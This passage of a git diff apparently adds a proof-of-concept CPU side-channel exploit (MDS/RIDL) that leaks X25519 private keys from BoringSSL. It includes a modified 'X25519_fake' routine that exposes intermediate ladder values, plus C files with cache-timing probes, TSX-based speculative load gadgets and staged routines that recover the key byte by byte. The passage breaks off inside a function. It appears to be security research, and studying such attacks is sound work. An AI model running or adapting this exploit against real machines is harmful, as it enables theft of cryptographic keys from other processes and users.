int64_lshift21(carry5); + carry7 = (s7 + (1 << 20)) >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry9 = (s9 + (1 << 20)) >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry11 = (s11 + (1 << 20)) >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + carry13 = (s13 + (1 << 20)) >> 21; + s14 += carry13; + s13 -= int64_lshift21(carry13); + carry15 = (s15 + (1 << 20)) >> 21; + s16 += carry15; + s15 -= int64_lshift21(carry15); + carry17 = (s17 + (1 << 20)) >> 21; + s18 += carry17; + s17 -= int64_lshift21(carry17); + carry19 = (s19 + (1 << 20)) >> 21; + s20 += carry19; + s19 -= int64_lshift21(carry19); + carry21 = (s21 + (1 << 20)) >> 21; + s22 += carry21; + s21 -= int64_lshift21(carry21); + s11 += s23 * 666643; + s12 += s23 * 470296; + s13 += s23 * 654183; + s14 -= s23 * 997805; + s15 += s23 * 136657; + s16 -= s23 * 683901; + s23 = 0; + s10 += s22 * 666643; + s11 += s22 * 470296; + s12 += s22 * 654183; + s13 -= s22 * 997805; + s14 += s22 * 136657; + s15 -= s22 * 683901; + s22 = 0; + s9 += s21 * 666643; + s10 += s21 * 470296; + s11 += s21 * 654183; + s12 -= s21 * 997805; + s13 += s21 * 136657; + s14 -= s21 * 683901; + s21 = 0; + s8 += s20 * 666643; + s9 += s20 * 470296; + s10 += s20 * 654183; + s11 -= s20 * 997805; + s12 += s20 * 136657; + s13 -= s20 * 683901; + s20 = 0; + s7 += s19 * 666643; + s8 += s19 * 470296; + s9 += s19 * 654183; + s10 -= s19 * 997805; + s11 += s19 * 136657; + s12 -= s19 * 683901; + s19 = 0; + s6 += s18 * 666643; + s7 += s18 * 470296; + s8 += s18 * 654183; + s9 -= s18 * 997805; + s10 += s18 * 136657; + s11 -= s18 * 683901; + s18 = 0; + carry6 = (s6 + (1 << 20)) >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry8 = (s8 + (1 << 20)) >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry10 = (s10 + (1 << 20)) >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry12 = (s12 + (1 << 20)) >> 21; + s13 += carry12; + s12 -= int64_lshift21(carry12); + carry14 = (s14 + (1 << 20)) >> 21; + s15 += 
carry14; + s14 -= int64_lshift21(carry14); + carry16 = (s16 + (1 << 20)) >> 21; + s17 += carry16; + s16 -= int64_lshift21(carry16); + carry7 = (s7 + (1 << 20)) >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry9 = (s9 + (1 << 20)) >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry11 = (s11 + (1 << 20)) >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + carry13 = (s13 + (1 << 20)) >> 21; + s14 += carry13; + s13 -= int64_lshift21(carry13); + carry15 = (s15 + (1 << 20)) >> 21; + s16 += carry15; + s15 -= int64_lshift21(carry15); + s5 += s17 * 666643; + s6 += s17 * 470296; + s7 += s17 * 654183; + s8 -= s17 * 997805; + s9 += s17 * 136657; + s10 -= s17 * 683901; + s17 = 0; + s4 += s16 * 666643; + s5 += s16 * 470296; + s6 += s16 * 654183; + s7 -= s16 * 997805; + s8 += s16 * 136657; + s9 -= s16 * 683901; + s16 = 0; + s3 += s15 * 666643; + s4 += s15 * 470296; + s5 += s15 * 654183; + s6 -= s15 * 997805; + s7 += s15 * 136657; + s8 -= s15 * 683901; + s15 = 0; + s2 += s14 * 666643; + s3 += s14 * 470296; + s4 += s14 * 654183; + s5 -= s14 * 997805; + s6 += s14 * 136657; + s7 -= s14 * 683901; + s14 = 0; + s1 += s13 * 666643; + s2 += s13 * 470296; + s3 += s13 * 654183; + s4 -= s13 * 997805; + s5 += s13 * 136657; + s6 -= s13 * 683901; + s13 = 0; + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = (s0 + (1 << 20)) >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry2 = (s2 + (1 << 20)) >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry4 = (s4 + (1 << 20)) >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry6 = (s6 + (1 << 20)) >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry8 = (s8 + (1 << 20)) >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry10 = (s10 + (1 << 20)) >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry1 = (s1 + (1 << 20)) >> 21; + s2 += carry1; + s1 -= 
int64_lshift21(carry1); + carry3 = (s3 + (1 << 20)) >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry5 = (s5 + (1 << 20)) >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry7 = (s7 + (1 << 20)) >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry9 = (s9 + (1 << 20)) >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry11 = (s11 + (1 << 20)) >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = s0 >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry1 = s1 >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry2 = s2 >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry3 = s3 >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry4 = s4 >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry5 = s5 >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry6 = s6 >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry7 = s7 >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry8 = s8 >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry9 = s9 >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry10 = s10 >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry11 = s11 >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = s0 >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry1 = s1 >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry2 = s2 >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry3 = s3 >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry4 = s4 >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry5 = s5 >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry6 = 
s6 >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry7 = s7 >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry8 = s8 >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry9 = s9 >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry10 = s10 >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + s[0] = s0 >> 0; + s[1] = s0 >> 8; + s[2] = (s0 >> 16) | (s1 << 5); + s[3] = s1 >> 3; + s[4] = s1 >> 11; + s[5] = (s1 >> 19) | (s2 << 2); + s[6] = s2 >> 6; + s[7] = (s2 >> 14) | (s3 << 7); + s[8] = s3 >> 1; + s[9] = s3 >> 9; + s[10] = (s3 >> 17) | (s4 << 4); + s[11] = s4 >> 4; + s[12] = s4 >> 12; + s[13] = (s4 >> 20) | (s5 << 1); + s[14] = s5 >> 7; + s[15] = (s5 >> 15) | (s6 << 6); + s[16] = s6 >> 2; + s[17] = s6 >> 10; + s[18] = (s6 >> 18) | (s7 << 3); + s[19] = s7 >> 5; + s[20] = s7 >> 13; + s[21] = s8 >> 0; + s[22] = s8 >> 8; + s[23] = (s8 >> 16) | (s9 << 5); + s[24] = s9 >> 3; + s[25] = s9 >> 11; + s[26] = (s9 >> 19) | (s10 << 2); + s[27] = s10 >> 6; + s[28] = (s10 >> 14) | (s11 << 7); + s[29] = s11 >> 1; + s[30] = s11 >> 9; + s[31] = s11 >> 17; +} +static void x25519_scalar_mult_generic(uint8_t out[32], + const uint8_t scalar[32], + const uint8_t point[32]) { + fe x1, x2, z2, x3, z3, tmp0, tmp1; + fe_loose x2l, z2l, x3l, tmp0l, tmp1l; + uint8_t e[32]; + OPENSSL_memcpy(e, scalar, 32); + e[0] &= 248; + e[31] &= 127; + e[31] |= 64; + // The following implementation was transcribed to Coq and proven to + // correspond to unary scalar multiplication in affine coordinates given that + // x1 != 0 is the x coordinate of some point on the curve. It was also checked + // in Coq that doing a ladderstep with x1 = x3 = 0 gives z2' = z3' = 0, and z2 + // = z3 = 0 gives z2' = z3' = 0. The statement was quantified over the + // underlying field, so it applies to Curve25519 itself and the quadratic + // twist of Curve25519. 
It was not proven in Coq that prime-field arithmetic + // correctly simulates extension-field arithmetic on prime-field values. + // The decoding of the byte array representation of e was not considered. + // Specification of Montgomery curves in affine coordinates: + // + // Proof that these form a group that is isomorphic to a Weierstrass curve: + // + // Coq transcription and correctness proof of the loop (where scalarbits=255): + // + // + // preconditions: 0 <= e < 2^255 (not necessarily e < order), fe_invert(0) = 0 + fe_frombytes(&x1, point); + fe_1(&x2); + fe_0(&z2); + fe_copy(&x3, &x1); + fe_1(&z3); + unsigned swap = 0; + int pos; + for (pos = 254; pos >= 0; --pos) { + // loop invariant as of right before the test, for the case where x1 != 0: + // pos >= -1; if z2 = 0 then x2 is nonzero; if z3 = 0 then x3 is nonzero + // let r := e >> (pos+1) in the following equalities of projective points: + // to_xz (r*P) === if swap then (x3, z3) else (x2, z2) + // to_xz ((r+1)*P) === if swap then (x2, z2) else (x3, z3) + // x1 is the nonzero x coordinate of the nonzero point (r*P-(r+1)*P) + unsigned b = 1 & (e[pos / 8] >> (pos & 7)); + swap ^= b; + fe_cswap(&x2, &x3, swap); + fe_cswap(&z2, &z3, swap); + swap = b; + // Coq transcription of ladderstep formula (called from transcribed loop): + // + // + // x1 != 0 + // x1 = 0 + fe_sub(&tmp0l, &x3, &z3); + fe_sub(&tmp1l, &x2, &z2); + fe_add(&x2l, &x2, &z2); + fe_add(&z2l, &x3, &z3); + fe_mul_tll(&z3, &tmp0l, &x2l); + fe_mul_tll(&z2, &z2l, &tmp1l); + fe_sq_tl(&tmp0, &tmp1l); + fe_sq_tl(&tmp1, &x2l); + fe_add(&x3l, &z3, &z2); + fe_sub(&z2l, &z3, &z2); + fe_mul_ttt(&x2, &tmp1, &tmp0); + fe_sub(&tmp1l, &tmp1, &tmp0); + fe_sq_tl(&z2, &z2l); + fe_mul121666(&z3, &tmp1l); + fe_sq_tl(&x3, &x3l); + fe_add(&tmp0l, &tmp0, &z3); + fe_mul_ttt(&z3, &x1, &z2); + fe_mul_tll(&z2, &tmp1l, &tmp0l); + } + // here pos=-1, so r=e, so to_xz (e*P) === if swap then (x3, z3) else (x2, z2) + fe_cswap(&x2, &x3, swap); + fe_cswap(&z2, &z3, swap); + 
fe_invert(&z2, &z2); + fe_mul_ttt(&x2, &x2, &z2); + fe_tobytes(out, &x2); +} +static void x25519_scalar_mult(uint8_t out[32], const uint8_t scalar[32], + const uint8_t point[32]) { +#if defined(BORINGSSL_X25519_NEON) + if (CRYPTO_is_NEON_capable()) { + x25519_NEON(out, scalar, point); + return; + } +#endif + x25519_scalar_mult_generic(out, scalar, point); +} +void X25519_public_from_private(uint8_t out_public_value[32], + const uint8_t private_key[32]) { +#if defined(BORINGSSL_X25519_NEON) + if (CRYPTO_is_NEON_capable()) { + static const uint8_t kMongomeryBasePoint[32] = {9}; + x25519_NEON(out_public_value, private_key, kMongomeryBasePoint); + return; + } +#endif + uint8_t e[32]; + OPENSSL_memcpy(e, private_key, 32); + e[0] &= 248; + e[31] &= 127; + e[31] |= 64; + ge_p3 A; + x25519_ge_scalarmult_base(&A, e); + // We only need the u-coordinate of the curve25519 point. The map is + // u=(y+1)/(1-y). Since y=Y/Z, this gives u=(Z+Y)/(Z-Y). + fe_loose zplusy, zminusy; + fe zminusy_inv; + fe_add(&zplusy, &A.Z, &A.Y); + fe_sub(&zminusy, &A.Z, &A.Y); + fe_loose_invert(&zminusy_inv, &zminusy); + fe_mul_tlt(&zminusy_inv, &zplusy, &zminusy_inv); + fe_tobytes(out_public_value, &zminusy_inv); +} + +void X25519_fake(uint8_t out[32], + const uint8_t scalar[32], + const uint8_t point[32], + int iteration) { + fe x1, x2, z2, x3, z3, tmp0, tmp1; + fe_loose x2l, z2l, x3l, tmp0l, tmp1l; + + uint8_t e[32]; + OPENSSL_memcpy(e, scalar, 32); + e[0] &= 248; + e[31] &= 127; + e[31] |= 64; + + // The following implementation was transcribed to Coq and proven to + // correspond to unary scalar multiplication in affine coordinates given that + // x1 != 0 is the x coordinate of some point on the curve. It was also checked + // in Coq that doing a ladderstep with x1 = x3 = 0 gives z2' = z3' = 0, and z2 + // = z3 = 0 gives z2' = z3' = 0. The statement was quantified over the + // underlying field, so it applies to Curve25519 itself and the quadratic + // twist of Curve25519. 
It was not proven in Coq that prime-field arithmetic + // correctly simulates extension-field arithmetic on prime-field values. + // The decoding of the byte array representation of e was not considered. + // Specification of Montgomery curves in affine coordinates: + // + // Proof that these form a group that is isomorphic to a Weierstrass curve: + // + // Coq transcription and correctness proof of the loop (where scalarbits=255): + // + // + // preconditions: 0 <= e < 2^255 (not necessarily e < order), fe_invert(0) = 0 + fe_frombytes(&x1, point); + fe_1(&x2); + fe_0(&z2); + fe_copy(&x3, &x1); + fe_1(&z3); + + unsigned swap = 0; + int pos; + for (pos = 254; pos >= 0; --pos) { + // loop invariant as of right before the test, for the case where x1 != 0: + // pos >= -1; if z2 = 0 then x2 is nonzero; if z3 = 0 then x3 is nonzero + // let r := e >> (pos+1) in the following equalities of projective points: + // to_xz (r*P) === if swap then (x3, z3) else (x2, z2) + // to_xz ((r+1)*P) === if swap then (x2, z2) else (x3, z3) + // x1 is the nonzero x coordinate of the nonzero point (r*P-(r+1)*P) + unsigned b = 1 & (e[pos / 8] >> (pos & 7)); + swap ^= b; + fe_cswap(&x2, &x3, swap); + fe_cswap(&z2, &z3, swap); + swap = b; + // Coq transcription of ladderstep formula (called from transcribed loop): + // + // + // x1 != 0 + // x1 = 0 + fe_sub(&tmp0l, &x3, &z3); + fe_sub(&tmp1l, &x2, &z2); + fe_add(&x2l, &x2, &z2); + fe_add(&z2l, &x3, &z3); + fe_mul_tll(&z3, &tmp0l, &x2l); + fe_mul_tll(&z2, &z2l, &tmp1l); + fe_sq_tl(&tmp0, &tmp1l); + fe_sq_tl(&tmp1, &x2l); + fe_add(&x3l, &z3, &z2); + fe_sub(&z2l, &z3, &z2); + fe_mul_ttt(&x2, &tmp1, &tmp0); + fe_sub(&tmp1l, &tmp1, &tmp0); + fe_sq_tl(&z2, &z2l); + fe_mul121666(&z3, &tmp1l); + fe_sq_tl(&x3, &x3l); + fe_add(&tmp0l, &tmp0, &z3); + fe_mul_ttt(&z3, &x1, &z2); + if (pos == iteration) { + memcpy(out, &z3, 40); + return; + } + fe_mul_tll(&z2, &tmp1l, &tmp0l); + } + // here pos=-1, so r=e, so to_xz (e*P) === if swap then (x3, z3) else (x2, 
z2) + fe_cswap(&x2, &x3, swap); + fe_cswap(&z2, &z3, swap); + + fe_invert(&z2, &z2); + fe_mul_ttt(&x2, &x2, &z2); + fe_tobytes(out, &x2); +} diff --git a/pocs/cpus/mds-x25519/leak_evict_x25519.c b/pocs/cpus/mds-x25519/leak_evict_x25519.c new file mode 100644 index 00000000..414aba5e --- /dev/null +++ b/pocs/cpus/mds-x25519/leak_evict_x25519.c @@ -0,0 +1,464 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + + +#define MEMSZ (256*512 * 100) + +#ifndef EVICT +#define EVICT 24 +#endif + +#define CACHE_MISS 150 + +static inline __attribute__((always_inline)) int is_cached(void *ptr1) { + uint32_t diff; + asm volatile ( + //"CPUID\n\t" + "mfence\n\t" + "RDTSCP\n\t" + "mov rdx, [%1]\n\t" + "mov rbx, rax\n\t" + "RDTSCP\n\t" + "sub rax, rbx\n\t" + "mov %0, eax\n\t" + //"mfence\n\t" + + : "=b" (diff) + : "b"(ptr1) + : "rax", "rcx", "rdx"); + + return diff < CACHE_MISS; +} + +const unsigned long probe1_addr = 0x780000000; +char *probe1 = (char*) probe1_addr; +const unsigned long probe3_addr = 0x560000000; +char *probe3 = (char*) probe3_addr; +const unsigned long evict_addr = 0x340000000; +char *evict = (char*) evict_addr; + + +// Offset up to 4096 - be aware of boundaries on cache lines though! +static int ridl_confirm(unsigned long off, unsigned long prefix, size_t mask, unsigned int rol) { + if ((off & 0x3f) > 0x38) { + printf("\n\nERROR\n"); + printf("Trying RIDL on cross-cacheline offset!\n\n"); + exit(1); + } + _mm_clflush(probe1); + _mm_mfence(); + + // Evict target cache line - code works without it, but much worse. 
// One histogram entry: |i| is the candidate value, |cnt| how often it was seen.
typedef struct pair {unsigned short i; unsigned short cnt;} pair;

// qsort comparator over |pair| that orders by |cnt|, largest first.
// Returns -1 when a has the larger count, 1 when b does, 0 on a tie.
int cmp(const void* a, const void* b) {
  const unsigned short lhs = ((const pair*)a)->cnt;
  const unsigned short rhs = ((const pair*)b)->cnt;
  return (lhs < rhs) - (lhs > rhs);
}
// Returns the index (0..255) of the largest counter in |results|, which must
// hold at least 256 entries. On ties the lowest index wins.
int get_best(unsigned short *results) {
  int winner = 0;
  for (int idx = 1; idx < 256; idx++) {
    // Strict comparison keeps the earliest maximum.
    if (results[idx] > results[winner]) {
      winner = idx;
    }
  }
  return winner;
}
int stage4(size_t best_guess, size_t secret_offset, unsigned char* secret);
void stage5(size_t secret_offset, unsigned char* secret);

// Stage 3: guess the five variable bits (bits 3..7) of the first secret byte,
// then hand promising guesses to stage4/stage5 to recover the rest.
//
// Runs forever. Each outer iteration:
//   1. prints every candidate secret collected so far;
//   2. for each guess 0x08, 0x10, ..., 0xf8 calls ridl_confirm() REPS3 times
//      and counts the calls that did not return -1 (saturating at 0xfffe);
//   3. for each guess with at least 10 hits that has not been tried yet,
//      compares the hit count at the real offset with the hit count at
//      off + 0x140 and only proceeds when the ratio is at least 300;
//   4. runs stage4 and stage5 on the guess and discards the result unless the
//      top two bits of byte 31 are 0b01 (the X25519 clamping pattern).
//
// secret_offset  page offset of the secret; leaking starts two bytes earlier.
// saved_rbp      unused; kept so the call site does not need to change.
void stage3(size_t secret_offset, size_t saved_rbp) {
  (void)saved_rbp;

  printf("Step 3: Guess 5 bits of secret.\n");
  printf("Leaking at offset = 0x%zx, prefix = 0xXYZ0000\n", secret_offset - 2);

#define STAGE3_START 0
#define STAGE3_END (1<<8)
//#define STAGE3_START 0xe80
//#define STAGE3_END 0xe88
#define REPS3 100000
  enum { MAX_SECRETS = 0x1000 };  // must stay a power of two (used as a mask)

  static unsigned char potential_secrets[MAX_SECRETS][32];
  int leaked_secrets = 0;
  size_t off = secret_offset-2;
  size_t mask = 0x00ffFFF8;

  // One counter per guess>>3. 0xffff marks "already tried".
  unsigned short results[1<<9] = {0};
  int iter = 0;
  while (1) {
    printf("iter=%d\n", ++iter);

    // Slots are reused modulo MAX_SECRETS when storing, so never read past
    // the end of the table when printing.
    int shown = leaked_secrets < MAX_SECRETS ? leaked_secrets : MAX_SECRETS;
    for (int i = 0; i < shown; i++) {
      print_secret(potential_secrets[i], 31);
    }

    for (size_t guess = STAGE3_START; guess < STAGE3_END; guess += 1<<3) {
      if (guess == 0) continue;
      if (results[guess>>3] >= 0xfffeu) continue;
      for (int times = 0; times < REPS3; times++) {
        size_t prefix = (guess << 16) | 0x8; // This 0x8 is guessed...
        int byte = ridl_confirm(off, prefix, mask, 23);
        if (byte != -1 && results[guess>>3] < 0xfffeu) {
          results[guess>>3]++;
        }
      }
    }
    print_results3(results);

    for (int i = 0; i < (1<<9); i++) {
      if (results[i] < 10 || results[i] == 0xffffu) continue;
      size_t guess = (size_t)i << 3;
      // %zx: guess is a size_t (the original %04x was a type mismatch).
      printf("Trying guess = %04zx.\n", guess);
      results[i] = 0xffff;

      // One last check: do we see similar leakage when leaking from
      // off + 0x140? If so the signal is not specific to the secret.
      int normal = 0;
      int fake = 0;
      for (int k = 0; k < iter*10; k++) {
        printf("Precheck: %d/%d...\n", k, iter*10);
        for (int j = 0; j < REPS3; j++) {
          size_t prefix = (guess << 16) | 0x8;
          int byte = ridl_confirm(off, prefix, mask, 23);
          if (byte != -1) {
            normal++;
          }
        }
        for (int j = 0; j < REPS3; j++) {
          size_t prefix = (guess << 16) | 0x8;
          int byte = ridl_confirm(off + 0x140, prefix, mask, 23);
          if (byte != -1) {
            fake++;
          }
        }
      }
      // Expecting normal~100, fake~0. The product is formed in 64 bits so a
      // large |normal| on late iterations cannot overflow; the quotient is at
      // most (normal+10)*10 and therefore fits an int again.
      int ratio = (int)(((long long)normal + 10) * 100 / ((long long)fake + 10));
      printf("Preliminary check: normal %d; fake %d - ratio = %d\n", normal, fake, ratio);

      if (ratio < 300) {
        printf("Ratio too weak, ignoring.\n");
        continue;
      }

      unsigned char* secret = potential_secrets[leaked_secrets & (MAX_SECRETS - 1)];
      leaked_secrets++;
      int rv = stage4(guess, secret_offset, secret);
      if (rv == 0) {
        leaked_secrets--;
        continue;
      }
      stage5(secret_offset, secret);
      // From the boringssl code:
      //   e[31] &= 127;
      //   e[31] |= 64;
      if ((secret[31] & 128) != 0 || (secret[31] & 64) != 64) {
        printf("We leaked something, but it doesn't match the key format.\n");
        leaked_secrets--;
        continue;
      }
    }
  }
}
+ + memset(secret, 0, 32); + secret[0] = best_guess & 0xff; + secret[1] = best_guess >> 8; + + int rol = 32; + for (int ind = 1; ind < 6; ind++) { + if (rol > 0) { + rol -= 8; + } + size_t off = secret_offset - 2; + for (int nib_ind = 0; nib_ind < 8 / BITS_AT_A_TIME; nib_ind++) { + //if (ind == 1 && nib_ind < 4 / BITS_AT_A_TIME) { continue; } + printf("Leaking at offset = 0x%zx (%d:%d), prefix = 0x%zx, mask = 0x%zx\n", + off, ind, nib_ind, prefix, mask); + ssize_t best = leak_and_move(&prefix, &mask, 16+ind*8+nib_ind*BITS_AT_A_TIME, + off, rol); + if (best == -1) return 0; + secret[ind] |= best << (nib_ind * BITS_AT_A_TIME); + } + print_secret(secret, ind); + } + return 1; +} + +void stage5(size_t secret_offset, unsigned char* secret) { + printf("\nStage 5: Leak secret[6:].\n"); + + size_t prefix = 0; + for (int i = 0; i < 6; i++) { + prefix |= ((size_t)secret[i]) << (8*i+8); + } + + int rol = 56; + for (int ind = 6; ind < 32; ind++) { + size_t mask = 0x00ffFFFFffffFFFFull; + size_t off = secret_offset - 7 + ind; + for (int nib_ind = 0; nib_ind < 8 / BITS_AT_A_TIME; nib_ind++) { + printf("Leaking at offset = 0x%zx (%d:%d), prefix = 0x%zx, mask = 0x%zx\n", + off, ind, nib_ind, prefix, mask); + ssize_t best = leak_and_move(&prefix, &mask, 56 + nib_ind * BITS_AT_A_TIME, + off, 56); + if (best == -1) return; + secret[ind] |= best << (nib_ind * BITS_AT_A_TIME); + } + print_secret(secret, ind); + prefix >>= 8; + } +} + +void run() { + map(); + + size_t cache_line_offset = stage1(); + size_t saved_rbp = stage2(cache_line_offset); + size_t secret_offset = (saved_rbp + 0xa0) & 0xfffu; + printf("Secret offset = 0x%zx\n", secret_offset); + printf("\n\n"); + + // Stage 3 calls stage 4 and 5 + stage3(secret_offset, saved_rbp); +} + +int main() { + run(); + + return 0; +} + diff --git a/pocs/cpus/mds-x25519/leak_intermediate_x25519.c b/pocs/cpus/mds-x25519/leak_intermediate_x25519.c new file mode 100644 index 00000000..68e18317 --- /dev/null +++ 
b/pocs/cpus/mds-x25519/leak_intermediate_x25519.c @@ -0,0 +1,310 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + /* NOTE(review): the header names after each #include above were lost in extraction; restore them from the upstream file. */ + + +#define MEMSZ (256*512 * 100) + +#define CACHE_MISS 100 + /* is_cached: fences, then times a single load from ptr1 between RDTSC and RDTSCP; returns nonzero when the low 32 bits of the cycle delta are below CACHE_MISS. */ +static inline __attribute__((always_inline)) int is_cached(void *ptr1) { + uint32_t diff; + asm volatile ( + //"cpuid\n\t" + "mfence\n\t" + "lfence\n\t" + "RDTSC\n\t" + "mov rbx, rax\n\t" + "mov rdx, [%1]\n\t" + "RDTSCP\n\t" + "lfence\n\t" + "sub rax, rbx\n\t" + "mov %0, eax\n\t" + + : "=b" (diff) + : "S"(ptr1) + : "rax", "rcx", "rdx"); + + return diff < CACHE_MISS; +} + +const unsigned long probe1_addr = 0x7895e4000; +char *probe1 = (char*) probe1_addr; +const unsigned long probe3_addr = 0x560000000; +char *probe3 = (char*) probe3_addr; + + /* mlpds: XORs prefix with probe1_addr, flushes probe1, then runs 32 rounds of a TSX block that loads from address -1, XORs the loaded value with the prepared prefix and prefetches the result; returns 0 when probe1 is cached afterwards (is_cached) and -1 otherwise. */ +static int mlpds(unsigned long prefix) { + prefix ^= probe1_addr; + _mm_clflush(probe1); + _mm_mfence(); + _mm_sfence(); + _mm_lfence(); + asm volatile("CPUID"::: "eax","ebx","ecx","edx", "memory"); + + + // TODO find optimal number of iterations. 
+ for (int i = 0; i < 32; i++) { + asm volatile( + ".align 64\n\t" + "0:\n\t" + "clflush [%0]\n\t" + "sfence\n\t" + // idk why, helps speed up + "xbegin 2f\n\t" + + //xbegin block: + "mov rax, [-1]\n\t" + "xor rax, %1\n\t" + "prefetchnta [rax]\n" + + "xend\n\t" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "3: jmp 3b\n" + "2:\n\t" + //"dec r15\n\t" + //"jne 0b\n\t" + : + : "r" (probe3), "r"(prefix) + : "rax"); + } + + int p1 = is_cached(probe1); + if (p1) { return 0; } + return -1; +} + + /* map: maps one 4096-byte anonymous page at each fixed probe address (probe1, probe3), fills both with 0x99, and exits via err() when either mmap does not return the requested address. */ +void map() { + if (mmap(probe1, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe1) { + err(1, "mmap(probe1)"); + } + memset(probe1, 0x99, 4096); + if (mmap(probe3, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe3) { + err(1, "mmap(probe3)"); + } + memset(probe3, 0x99, 4096); +} + /* print_secret: prints the 32 bytes at secret as space-separated two-digit hex values after the label Secret: and ends the line. */ +void print_secret(unsigned char* secret) { + printf("Secret:"); + for (int i = 0; i < 32; i++) { + printf(" %02x", secret[i]); + } + printf("\n"); +} + /* set_bit: sets bit number bit of privkey (bit 0 is the least significant bit of privkey[0]) to the value to; a negative bit index is ignored. 
Callers in this file pass 0 or 1 for to. */ +void set_bit(uint8_t* privkey, int bit, int to) { + if (bit < 0) return; + privkey[bit / 8] &= ~(1 << (bit & 7)); + privkey[bit / 8] |= to << (bit & 7); +} + +int X25519_fake(uint8_t* out, const uint8_t* privkey, + const uint8_t* peer_pubkey, int iteration); + +void X25519_public_from_private(uint8_t out_public_value[32], + const uint8_t private_key[32]); + /* stage3: reads the 32-byte client private key as hex from stdin, derives its public key, optionally resumes from /tmp/checkpoint, then decides one bit of privkey per iteration (start_iteration down to 3) by comparing how often mlpds hits on the X25519_fake outputs computed with that bit cleared versus set. Both parameters are unused. Exits via errx() on malformed stdin or checkpoint data. */ +void stage3(size_t secret_offset, size_t saved_rbp) { + uint8_t pubkey[32]; + uint8_t 
